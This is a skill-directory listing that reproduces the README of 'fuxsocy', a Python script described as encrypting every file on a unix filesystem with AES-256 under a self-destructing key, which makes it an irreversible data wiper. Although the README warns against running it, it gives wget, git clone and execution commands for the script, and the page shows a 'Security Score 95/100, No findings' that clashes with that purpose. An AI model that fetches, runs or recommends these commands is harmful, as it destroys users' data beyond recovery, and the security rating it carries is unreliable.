SkillAgentSearch skills...

Fuxsocy

This is intended to encrypt every bit of data in a unix filesystem using 256-bit AES with a self-destructing, randomly generated key.

Install / Use

/learn @D34thByte/Fuxsocy
About this skill

Quality Score

0/100

Supported Platforms

Universal

README

fuxsocy

WARNING: do not actually execute this. You will not be able to recover the files.

  • This is intended to encrypt every bit of data in a unix filesystem using 256-bit AES with a self-destructing, randomly generated key.

Prerequisites:

  • python
  • pycrypto
sudo apt install python python-pip
sudo pip install pycrypto

Usage:

wget https://raw.githubusercontent.com/D34thByte/fuxsocy/master/fuxsocy.py
sudo chmod +x fuxsocy.py
./fuxsocy.py

or

git clone https://github.com/D34thByte/fuxsocy.git
cd /fuxsocy && python fuxsocy.py

Related Skills

View on GitHub
GitHub Stars59
CategoryDevelopment
Updated2h ago
Forks7

Languages

Python

Security Score

95/100

Audited on Mar 29, 2026

No findings